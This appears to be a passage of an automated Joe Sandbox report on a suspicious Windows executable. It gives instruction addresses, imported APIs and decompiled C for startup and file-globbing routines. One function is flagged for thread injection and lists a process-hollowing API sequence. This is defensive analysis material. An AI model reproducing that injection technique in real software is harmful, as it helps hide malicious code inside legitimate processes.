0x00411eb5
0x00411eb6
0x00411ebe
0x00411ec1
0x00411ec5
0x00411eca
0x00411ed4
0x00411ed7
0x00411ed7
0x00411ee1
0x00411ee5
0x00000000
0x00000000
0x00411eeb
0x00411ef5
0x00411ef8
0x00411efb
0x00411f07
0x00411f18
0x00411f1b
0x00411f1b
0x00411f21
0x00411f26
0x00000000
0x00000000
0x00411f3f
0x00411f49
0x00411f4c
0x00411f54
0x00411f54
0x00411f63
0x00411f63
0x00411f28
0x00411f33
0x00411f36
0x00411f38
0x00000000
0x00411f38
0x00411f7e
0x00411f83
0x00411f86
0x00411f87
0x00411f97
0x00411fa5
0x00411fa5
0x00411faf
0x00411fb3
0x00000000
0x00000000
0x00411fb5
0x00411fb8
0x00411fc2
0x00411fc5
0x00411fcd
0x00411fdb
0x00411fdd
0x00411fe0
0x00411fe0
0x00411fe6
0x00411feb
0x00000000
0x00000000
0x00412004
0x0041200e
0x00412011
0x00412019
0x00412019
0x0041201f
0x00412028
0x00412028
0x00411fed
0x00411ff8
0x00411ffb
0x00411ffd
0x00000000
0x00411ffd
0x00412042
0x00412045
0x00412048
0x00412056
0x0041205b
0x00412062
0x0041206a
0x0041206d
0x00412071
0x0041207c
0x00412098
0x004120a3
0x004120a6
0x004120a9
0x004120b1
0x00000000
0x004120b1
0x00411fa3
0x00411fa3
0x00411fa3
0x00411fa5
0x00411f9c
0x00411f9c
0x00411f9c
0x00411d95
0x00411dac
0x00411db1
0x00411db3
0x004120b4
0x004120bb

APIs

VirtualProtect.KERNELBASE ref: 00412071

Strings

dAtsTYDEuXFFALbBPGARvZXMKEqRQlmyrZozsZDLZtBSesEKlQySGhhKGBaykHvOuqUZnZxCtnbzOMynRCgITjCxbB, xrefs: 00411D62
WHdxwVblbNfTGKiOlUygaMBQekTArfbRUCmhfExZtPGgYnJgWgdPirqBwkduLZziGoxdhACFcJxwPHBvTqJViuSIUV, xrefs: 00411C75
~, xrefs: 00411E4B
., xrefs: 00411E25
;, xrefs: 00411E9F
481035029895482919189744454404510355566990232, xrefs: 00411E38
@, xrefs: 00412062
q, xrefs: 00411EA3
L, xrefs: 00411E6F
y, xrefs: 00411EA9
M, xrefs: 00411E6B
y, xrefs: 00411EAD
ngNqkCxrmWjitGGcQCOTdGQkkavXRgvVoCmMJWrtPacoLEYmaeIfxTNXHhKESVkqkjGjgOUYplRxfWdomQjnuOqAnl, xrefs: 00411D95

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID: .$481035029895482919189744454404510355566990232$;$@$L$M$WHdxwVblbNfTGKiOlUygaMBQekTArfbRUCmhfExZtPGgYnJgWgdPirqBwkduLZziGoxdhACFcJxwPHBvTqJViuSIUV$dAtsTYDEuXFFALbBPGARvZXMKEqRQlmyrZozsZDLZtBSesEKlQySGhhKGBaykHvOuqUZnZxCtnbzOMynRCgITjCxbB$ngNqkCxrmWjitGGcQCOTdGQkkavXRgvVoCmMJWrtPacoLEYmaeIfxTNXHhKESVkqkjGjgOUYplRxfWdomQjnuOqAnl$q$y$y$~
API String ID: 544645111-2225272719
Opcode ID: 7353639ac445e588ca468dd27df4b9542e9b8164f82b0625ce9cd195f4d2bf38
Instruction ID: c1ddfac882092ca28d0c1fef0d605da383e04a441de3e6fa946777a2f5e50792
Opcode Fuzzy Hash: 7353639ac445e588ca468dd27df4b9542e9b8164f82b0625ce9cd195f4d2bf38
Instruction Fuzzy Hash: 7BF15570D04358CFDB10CFA8C484AAEBBF1BF89318F14855AD958AB351D778A986CF85

Uniqueness

Uniqueness Score: -1.00%

Function 004EEC21 Relevance: 23.2, APIs: 12, Strings: 1, Instructions: 467
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 004EEF02
GetThreadContext.KERNELBASE(?,00010007), ref: 004EEF17
ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004EEF38
VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 004EEF6A
VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040), ref: 004EEF8A
WriteProcessMemory.KERNELBASE(?,?,00000000,?,00000000), ref: 004EF0BD
VirtualProtectEx.KERNELBASE(?,?,?,00000002,?), ref: 004EF0DA
VirtualProtectEx.KERNELBASE(?,?,?,00000001,?), ref: 004EF144
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004EF166
WriteProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 004EF181
SetThreadContext.KERNELBASE(?,00010007), ref: 004EF19E
ResumeThread.KERNELBASE(?), ref: 004EF1AB

Strings

D, xrefs: 004EEE5A

Memory Dump Source

Source File: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: Virtual$Process$MemoryThread$AllocContextProtectWrite$CreateFreeReadResume
String ID: D
API String ID: 12256240-2746444292
Opcode ID: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction ID: f14853d1daf5c290361174a733dbf435bb876527ff68e3612e8f80380057f519
Opcode Fuzzy Hash: 0f12e257533f2bba003e1d6bb2e033b7a2472d2d85e254e8470fd1158bdd1a21
Instruction Fuzzy Hash: 28121671E00259EBDB21CFA5CD84BEEBBB5FF04705F1480AAE509E6250E7759A84CF18

Uniqueness

Uniqueness Score: -1.00%

Function 00401340 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 58
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 0040134F
LoadLibraryA.KERNEL32 ref: 00401368
GetProcAddress.KERNEL32 ref: 00401380
GetProcAddress.KERNEL32 ref: 00401395
GetModuleHandleA.KERNEL32 ref: 004013C7
GetProcAddress.KERNEL32 ref: 004013E3
atexit.MSVCRT ref: 00401401

Strings

libgcj-16.dll, xrefs: 004013C0
libgcc_s_dw2-1.dll, xrefs: 00401348, 0040135F
__deregister_frame_info, xrefs: 0040138A
_Jv_RegisterClasses, xrefs: 004013D8
__register_frame_info, xrefs: 00401375

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: AddressProc$HandleModule$LibraryLoadatexit
String ID: _Jv_RegisterClasses$__deregister_frame_info$__register_frame_info$libgcc_s_dw2-1.dll$libgcj-16.dll
API String ID: 2016387483-548026336
Opcode ID: a49af0327885dfaf37addc9f7394b8ef8a82b361c6fba9dbd006f98827e9bd4c
Instruction ID: 944ebc1ab6a9b7fb65a9cabfc219c15400e170629bf40ec202d1239acc89c01f
Opcode Fuzzy Hash: a49af0327885dfaf37addc9f7394b8ef8a82b361c6fba9dbd006f98827e9bd4c
Instruction Fuzzy Hash: 13111FB19043588AD310BF79A54512E7AE4EB80348F41853FDD8457A65EB7CD448C79F

Uniqueness

Uniqueness Score: -1.00%

Function 00424F00 Relevance: 12.1, APIs: 8, Instructions: 64
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileA.KERNEL32 ref: 00424F15
_errno.MSVCRT ref: 00424F7E
GetLastError.KERNEL32 ref: 00424F85
_errno.MSVCRT ref: 00424F91
_errno.MSVCRT ref: 00424F9E
_errno.MSVCRT ref: 00424FA8

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _errno$ErrorFileFindFirstLast
String ID:
API String ID: 2068755524-0
Opcode ID: df9ab3b089e42e85b99c3837e230caf84befe69d2a0c8e19520527bea3019630
Instruction ID: 5c54a7aa9ecc6ec69266cd62e650226d9670c2886410b73ad55dfc5529630234
Opcode Fuzzy Hash: df9ab3b089e42e85b99c3837e230caf84befe69d2a0c8e19520527bea3019630
Instruction Fuzzy Hash: 2411D570704361CADB10AF65F9812A9B790DFC2314F95469BE4608F346D37C8845C3BA

Uniqueness

Uniqueness Score: -1.00%

Function 004011A5 Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 39%

			E004011A5(void* __ebx) {
				char _v20;
				intOrPtr _v24;
				void* _v28;
				char _v44;
				char _v48;
				char* _v72;
				signed int _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr* _t18;
				intOrPtr _t21;
				intOrPtr* _t24;
				intOrPtr* _t26;
				void* _t30;
				signed int _t32;
				char* _t34;
				void* _t42;
				intOrPtr _t43;
				void* _t44;
				void* _t45;
				void* _t48;
				void* _t49;
				signed int _t50;
				signed int _t51;
				void* _t58;

				_t40 = __ebx;
				_push(__ebx);
				_t49 = _t48 - 0x14;
				_t18 =  *0x4f5500; // 0x41bc40
				if(_t18 != 0) {
					_v20 = 0;
					_v24 = 2;
					_v28 = 0;
					 *_t18();
					_t49 = _t49 - 0xc;
				}
				_v28 = E00401000; // executed
				SetUnhandledExceptionFilter(??); // executed
				_t50 = _t49 - 4;
				L0041BA40(_t42);
				_t21 =  *0x4ef224; // 0xfffffffd
				 *_t50 = _t21;
				E00420650(); // executed
				E0041B6A0(); // executed
				_t24 =  *0x536028;
				if(_t24 != 0) {
					_t40 = __imp___iob;
					 *0x4ef228 = _t24;
					_v28 = _t24;
					 *_t50 =  *((intOrPtr*)(_t40 + 0x10));
					L004121C0();
					_v28 =  *0x536028;
					 *_t50 =  *((intOrPtr*)(_t40 + 0x30));
					L004121C0();
					_v28 =  *0x536028;
					_t24 =  *((intOrPtr*)(_t40 + 0x50));
					 *_t50 = _t24;
					L004121C0();
				}
				L004121D0();
				_t43 =  *0x4ef228; // 0x4000
				 *_t24 = _t43;
				E0041C050(_t40, _t44, _t45);
				_t51 = _t50 & 0xfffffff0;
				_t26 = L0041BBD0();
				L004121D8();
				_v24 =  *_t26;
				_v28 =  *0x536000;
				 *_t51 =  *0x536004; // executed
				_t30 = L004AC6AC(_t51, _t58); // executed
				L004121C8();
				 *_t51 = _t30;
				ExitProcess(??);
				_v84 = 0x536000;
				 *((intOrPtr*)(_t51 - 0x3c)) = 0x536004;
				_v44 = 0;
				_v72 =  &_v44;
				_t32 =  *0x4ef220; // 0x2
				_v76 = _t32 & 0x00000001;
				_t34 =  &_v48;
				_v80 = _t34;
				L004121E0();
				return _t34;
			}

0x004011a5
0x004011b3
0x004011b4
0x004011b7
0x004011be
0x004011c0
0x004011c8
0x004011d0
0x004011d7
0x004011d9
0x004011d9
0x004011dc
0x004011e3
0x004011e8
0x004011eb
0x004011f0
0x004011f5
0x004011f8
0x004011fd
0x00401202
0x00401209
0x0040120b
0x00401211
0x00401216
0x0040121d
0x00401220
0x0040122a
0x00401231
0x00401234
0x0040123e
0x00401242
0x00401245
0x00401248
0x00401248
0x0040124d
0x00401252
0x00401258
0x0040125a
0x0040125f
0x00401262
0x00401267
0x0040126e
0x00401277
0x00401280
0x00401283
0x0040128a
0x0040128f
0x00401292
0x004012a7
0x004012af
0x004012b6
0x004012be
0x004012c2
0x004012ca
0x004012ce
0x004012d2
0x004012d6
0x004012de

APIs

SetUnhandledExceptionFilter.KERNEL32(?,?,?,?,004012F5), ref: 004011E3
_setmode.MSVCRT ref: 00401220
_setmode.MSVCRT ref: 00401234
_setmode.MSVCRT ref: 00401248
__p__fmode.MSVCRT ref: 0040124D
__p__environ.MSVCRT ref: 00401267
_cexit.MSVCRT ref: 0040128A
ExitProcess.KERNEL32 ref: 00401292

Memory Dump Source

Source File: 00000000.00000002.273997068.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.273993829.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274067183.00000000004B7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274139764.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274146572.00000000004F0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274151672.00000000004F1000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274212001.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274216902.000000000053B000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.274232449.0000000000555000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_hBB2KnTndI.jbxd

Yara matches

Similarity

API ID: _setmode$ExceptionExitFilterProcessUnhandled__p__environ__p__fmode_cexit
String ID:
API String ID: 3476844589-0
Opcode ID: 00ce2c2cb12d3d451cd5806ac6a92fdc0dbc261bd3cad2dd99e5ec2d359d762e
Instruction ID: 6e3a6e12f3a6c162d6cb87ca4d91f315a6727c89c3acc64a2b341cc734ff6212
Opcode Fuzzy Hash: 00ce2c2cb12d3d451cd5806ac6a92fdc0dbc261bd3cad2dd99e5ec2d359d762e
Instruction Fuzzy Hash: 2B213EB45047049FC700FF75D9856597BE0FF58314F01482EE984DB312D778E8989B9A

Uniqueness

Uniqueness Score: -1.00%

Function 00424120 Relevance: 40.9, APIs: 22, Strings: 1, Instructions: 645
stringCOMMON

Download Yara Rule

C-Code - Quality: 27%

			E00424120(signed int __eax, intOrPtr* __ecx, signed int __edx, intOrPtr _a4) {
				void* _v16;
				void _v32;
				signed int* _v36;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				int _v68;
				signed int* _v72;
				void* _v76;
				int _v80;
				signed int* _v84;
				intOrPtr _v88;
				signed int* _v92;
				signed int _v96;
				signed int _v97;
				char _v112;
				int _v116;
				int _v120;
				signed int* _t220;
				signed int _t221;
				signed int _t222;
				signed int _t223;
				signed int _t224;
				signed int _t225;
				signed int _t226;
				signed int _t229;
				signed int _t231;
				signed int _t239;
				signed int _t241;
				void* _t249;
				signed int _t250;
				signed int _t252;
				signed char* _t255;
				signed int _t256;
				signed int _t257;
				signed int* _t260;
				signed int _t261;
				int* _t263;
				signed int _t267;
				signed int* _t272;
				void* _t278;
				signed int _t294;
				signed int _t304;
				signed int _t308;
				void* _t311;
				int _t313;
				signed int _t324;
				signed int _t330;
				signed int _t336;
				signed int* _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t341;
				int _t342;
				signed int* _t343;
				void** _t346;
				signed int _t349;
				signed char* _t350;
				signed int _t352;
				signed int _t353;
				intOrPtr _t354;
				signed int _t355;
				int _t357;
				char* _t358;
				void* _t361;
				char* _t363;
				signed int* _t367;
				signed int* _t369;
				signed char* _t372;
				signed char* _t374;
				signed int _t377;
				signed int _t380;
				void* _t382;
				signed int _t384;
				signed char* _t386;
				intOrPtr _t388;
				signed int* _t393;
				signed int _t394;
				char* _t396;
				signed int _t399;
				intOrPtr* _t400;
				signed int* _t401;
				signed int* _t402;
				signed int _t403;
				signed int _t405;
				signed int _t406;
				signed int _t408;
				signed int* _t409;
				signed int _t410;
				signed int* _t411;
				signed int _t412;
				void* _t413;
				signed int* _t414;
				signed int _t415;
				intOrPtr _t416;
				signed int _t417;
				signed int* _t419;
				void* _t420;
				signed int* _t421;
				intOrPtr* _t422;
				signed int* _t425;
				intOrPtr* _t427;
				signed int* _t429;
				intOrPtr* _t430;
				signed int* _t431;
				intOrPtr* _t432;
				void* _t439;

				_t336 = __eax;
				_t421 = _t420 - 0x6c;
				_v52 = __edx;
				_v64 = __ecx;
				if((__edx & 0x00000004) != 0) {
					_v68 = _t421;
					 *_t421 = __eax;
					_t422 = _t421 - E0041C220(strlen(??) + 0x10 >> 4 << 4);
					_t405 = _t336;
					_t220 =  &_v112;
					_t393 = _t220;
					_v60 = _t220;
					_t221 =  *_t336 & 0x000000ff;
					L53:
					while(1) {
						if(_t221 == 0x7f) {
							L58:
							_t222 =  *(_t405 + 1) & 0x000000ff;
							 *_t393 = 0x7f;
							if(_t222 != 0) {
								_t393[0] = _t222;
								_t405 = _t405 + 2;
								_t221 =  *_t405 & 0x000000ff;
								_t393 =  &(_t393[0]);
								continue;
							}
							_t393 =  &(_t393[0]);
							_t405 = _t405 + 1;
							L55:
							_t369 =  &(_t393[0]);
							_t95 = _t405 + 1; // -1
							_t353 = _t95;
							 *_t393 = _t222;
							if(_t222 == 0 || _t222 == 0x7b) {
								if(_t222 == 0x7b) {
									_v56 = _t369;
									_t394 = _t353;
									do {
										L61:
										_t367 = _v56;
										_t349 = 1;
										while(1) {
											_t223 =  *(_t394 + 1) & 0x000000ff;
											if(_t223 == 0x7f) {
												goto L69;
											}
											L63:
											_t394 = _t394 + 1;
											L64:
											if(_t223 == 0x7d || _t223 == 0x2c && _t349 == 1) {
												_t349 = _t349 - 1;
												if(_t349 == 0) {
													if(_t223 != 0x2c) {
														_t225 = _t394;
														goto L90;
													}
													goto L80;
												}
												 *_t367 = _t223;
												_t223 =  *(_t394 + 1) & 0x000000ff;
												_t367 =  &(_t367[0]);
												if(_t223 != 0x7f) {
													goto L63;
												}
											} else {
												if(_t223 == 0x7b) {
													_t349 = _t349 + 1;
													_t338 = 1;
													_v48 = 1;
												} else {
													_v48 = _t223 != 0;
													_t338 = _v48 & 0x000000ff;
												}
												_t409 =  &(_t367[0]);
												 *_t367 = _t223;
												if(_t338 == 0) {
													if(_v48 == 0) {
														L71:
														_v56 = 1;
														L99:
														L51:
														return _v56;
													}
													_t367 = _t409;
													if(_t223 != 0x2c) {
														L98:
														 *_t367 = 0;
														_v56 = 1;
														goto L99;
													}
													L80:
													_t231 = _t394;
													_t408 = 1;
													goto L81;
													do {
														do {
															while(1) {
																L81:
																_t339 =  *(_t231 + 1) & 0x000000ff;
																_t114 = _t231 + 1; // -3
																_t352 = _t114;
																if(_t339 != 0x7f) {
																	goto L108;
																}
																L82:
																if( *((char*)(_t231 + 2)) != 0) {
																	while(1) {
																		_t339 =  *(_t352 + 2) & 0x000000ff;
																		_t118 = _t352 + 2; // 0x1
																		_t231 = _t118;
																		if(_t339 != 0x7f) {
																			break;
																		}
																		if( *(_t231 + 1) == 0) {
																			goto L98;
																		}
																		_t352 = _t231;
																	}
																	L87:
																	if(_t339 == 0x7b) {
																		_t408 = _t408 + 1;
																		L81:
																		_t339 =  *(_t231 + 1) & 0x000000ff;
																		_t114 = _t231 + 1; // -3
																		_t352 = _t114;
																		if(_t339 != 0x7f) {
																			goto L108;
																		}
																		goto L82;
																	}
																	if(_t339 != 0x7d) {
																		break;
																	}
																	goto L89;
																}
																goto L98;
																L108:
																_t231 = _t352;
																goto L87;
															}
														} while (_t339 != 0);
														goto L98;
														L89:
														_t408 = _t408 - 1;
													} while (_t408 != 0);
													L90:
													_t119 = _t225 + 1; // 0x2
													_t350 = _t119;
													_t226 =  *(_t225 + 1) & 0x000000ff;
													while(1) {
														_t367 =  &(_t367[0]);
														_t350 =  &(_t350[1]);
														 *(_t367 - 1) = _t226;
														if(_t226 == 0) {
															break;
														}
														_t226 =  *_t350 & 0x000000ff;
													}
													 *_t422 = _a4;
													_t406 = _v52;
													_t229 = E00424120(_v60, _v64, _t406);
													_v52 = _t406 | 0x00000001;
													if(_t229 == 1) {
														goto L71;
													}
													break;
												} else {
													_t367 = _t409;
													_t223 =  *(_t394 + 1) & 0x000000ff;
													if(_t223 == 0x7f) {
														goto L69;
													}
													goto L63;
												}
											}
											L69:
											_t224 =  *(_t394 + 2) & 0x000000ff;
											 *_t367 = 0x7f;
											_t337 =  &(_t367[0]);
											_t367[0] = _t224;
											if(_t224 != 0) {
												_t223 =  *(_t394 + 3) & 0x000000ff;
												_t367 = _t337;
												_t394 = _t394 + 3;
												goto L64;
											}
											_t367[0] = 0;
											goto L71;
										}
									} while ( *_t394 == 0x2c);
									_v56 = _t229;
									goto L99;
								}
								_t421 = _v68;
								goto L1;
							} else {
								_t222 =  *(_t405 + 1) & 0x000000ff;
								_t393 = _t369;
								_t405 = _t353;
								if(_t222 != 0x7f) {
									goto L54;
								}
								goto L58;
							}
						}
						L54:
						if(_t222 == 0x7b) {
							_v56 = _t393;
							_t394 = _t405;
							goto L61;
						}
						goto L55;
					}
				}
				L1:
				_v92 = _t421;
				 *_t421 = _t336;
				_t4 = strlen(??) + 1; // 0x1
				_t425 = _t421 - E0041C220(_t232 + 0x10 >> 4 << 4);
				_v116 = _t4;
				_v120 = _t336;
				 *_t425 =  &_v112;
				 *_t425 = memcpy(??, ??, ??); // executed
				_t239 = E00424B00(_t238); // executed
				_v48 = _t239;
				_t410 = _t239;
				_v32 = 0;
				_t241 = L00423B20( &_v44);
				_v56 = _t241;
				if(_t241 != 0) {
					L50:
					goto L51;
				}
				_t395 = _v52;
				if(L00423A80(_t410, _v52) == 0) {
					_t411 = _t425;
					 *_t425 = _v48;
					_t249 = E0041C220(strlen(??) + 0x10 >> 4 << 4);
					_t372 = _v48;
					_t427 = _t425 - _t249;
					_t396 =  &_v112;
					_t354 = _t396;
					do {
						_t250 =  *_t372 & 0x000000ff;
						if(_t250 == 0x7f) {
							_t250 = _t372[1] & 0x000000ff;
							_t372 =  &(_t372[1]);
						}
						_t354 = _t354 + 1;
						_t372 =  &(_t372[1]);
						 *(_t354 - 1) = _t250;
					} while (_t250 != 0);
					 *_t427 = _t396;
					L0042B408();
					_t425 = _t411;
					if(_t250 == 0) {
						_v56 = 1;
						goto L50;
					}
					_v56 = E00424070(_t250,  &_v44);
					goto L4;
				} else {
					 *_t425 =  &_v44;
					_v56 = E00424120(_t410, _v64, _t395 | 0x00000080);
					L4:
					_t355 = _v56;
					if(_t355 != 0) {
						goto L50;
					}
					_t252 =  *(_t336 + 1) & 0x000000ff;
					if(_t252 == 0x2f) {
						L8:
						 *_t425 = _v48;
						_t255 = strlen(??) + _t336;
						if(_t336 >= _t255) {
							_t336 =  *_t255 & 0x000000ff;
							_v60 = _t255;
							_v97 = _t336;
							L16:
							_t256 = _v97 & 0x000000ff;
							if(_t256 == 0x2f || _t256 == 0x5c) {
								_t374 = _v60;
								_t412 = _v97 & 0x000000ff;
								while(1) {
									_t374 =  &(_t374[1]);
									_t257 =  *_t374 & 0x000000ff;
									_t355 = _t355 & 0xffffff00 | _t257 == 0x0000005c;
									_t336 = _t336 & 0xffffff00 | _t257 == 0x0000002f | _t355;
									if(_t336 == 0) {
										break;
									}
									_t412 = _t257;
								}
								_v60 = _t374;
								_v97 = _t412;
								_v96 = _v48;
								goto L22;
							} else {
								_v97 = 0x5c;
								_v96 = _v48;
								L22:
								_t260 = _v36;
								_v56 = 2;
								_v72 = _t260;
								_t261 =  *_t260;
								_v48 = _v52 & 0x00008000;
								if(_t261 == 0) {
									L124:
									 *_t425 = _v72;
									free(??);
									goto L51;
								} else {
									goto L23;
								}
								while(1) {
									L23:
									 *_t425 = _t261;
									_t263 = E00425080();
									_t399 = _t263;
									if(_t263 == 0) {
										goto L118;
									}
									if(_v96 == 0) {
										_v68 = 0;
									} else {
										 *_t425 =  *_v72;
										_v68 = strlen(??);
									}
									_v76 = 0;
									_v88 = _v68 + 2;
									while(1) {
										L27:
										 *_t425 = _t399;
										_t278 = E00425240();
										_t413 = _t278;
										if(_t278 == 0) {
											break;
										}
										if(_v48 == 0 ||  *((intOrPtr*)(_t413 + 8)) == 0x10) {
											_t50 = _t413 + 0xc; // 0xc
											_t342 = _t50;
											if(L00423E50(_v60, _v52, _t342) != 0) {
												continue;
											}
											_t377 =  *(_t413 + 6) & 0x0000ffff;
											_v84 = _t425;
											_t429 = _t425 - E0041C220(_t377 + _v88 + 0xf >> 4 << 4);
											_v80 = 0;
											_t415 =  &_v112;
											if(_v68 != 0) {
												_v80 = _t377;
												 *_t429 = _t415;
												_v116 = _v68;
												_v120 =  *_v72;
												memcpy(??, ??, ??);
												_t357 = _v68;
												_t377 = _v80;
												_t294 =  *(_t429 + _t357 + 0xb) & 0x000000ff;
												if(_t294 == 0x2f || _t294 == 0x5c) {
													_v80 = _v68;
												} else {
													_v80 = _t357 + 1;
													 *((char*)(_t415 + _t357)) = _v97 & 0x000000ff;
												}
											}
											_v120 = _t342;
											_v116 = _t377 + 1;
											_t343 = _t429;
											 *_t429 = _v80 + _t415;
											memcpy(??, ??, ??);
											 *_t429 = _t415;
											_t430 = _t429 - E0041C220(strlen(??) + 0x10 >> 4 << 4);
											_t304 = _t415;
											_t358 =  &_v112;
											_t416 = _t358;
											while(1) {
												L34:
												_t380 =  *_t304 & 0x000000ff;
												if(_t380 == 0x7f) {
													break;
												}
												_t416 = _t416 + 1;
												_t304 = _t304 + 1;
												 *(_t416 - 1) = _t380;
												if(_t380 == 0) {
													L36:
													 *_t430 = _t358;
													L0042B408();
													_t417 = _t304;
													_t431 = _t343;
													if(_t304 == 0) {
														_v56 = 3;
														L117:
														_t425 = _v84;
														goto L27;
													}
													_t308 = _v52;
													_v56 = _v56 & ((_t304 & 0xffffff00 | _v56 == 0x00000002) & 0x000000ff) - 0x00000001;
													if((_t308 & 0x00000040) != 0) {
														if(_a4 != 0) {
															E00424070(_t417, _a4);
														}
														goto L117;
													}
													_t346 = _v76;
													if(_t346 == 0) {
														 *_t431 = 0xc;
														_t311 = malloc(??);
														if(_t311 == 0) {
															goto L117;
														}
														 *(_t311 + 8) = _t417;
														 *(_t311 + 4) = 0;
														 *_t311 = 0;
														L133:
														_v76 = _t311;
														goto L117;
													}
													_v80 = _t399;
													_t403 = _t308 & 0x00004000;
													while(1) {
														_t313 = _t346[2];
														 *_t431 = _t417;
														_v120 = _t313;
														if(_t403 != 0) {
															goto L40;
														}
														L44:
														L0042B400();
														_t382 =  *_t346;
														_t361 = _t346[1];
														if(_t313 > 0) {
															L41:
															if(_t361 == 0) {
																L46:
																_t399 = _v80;
																_v80 = _t313;
																 *_t431 = 0xc;
																_t311 = malloc(??);
																if(_t311 == 0) {
																	goto L117;
																}
																 *(_t311 + 8) = _t417;
																 *(_t311 + 4) = 0;
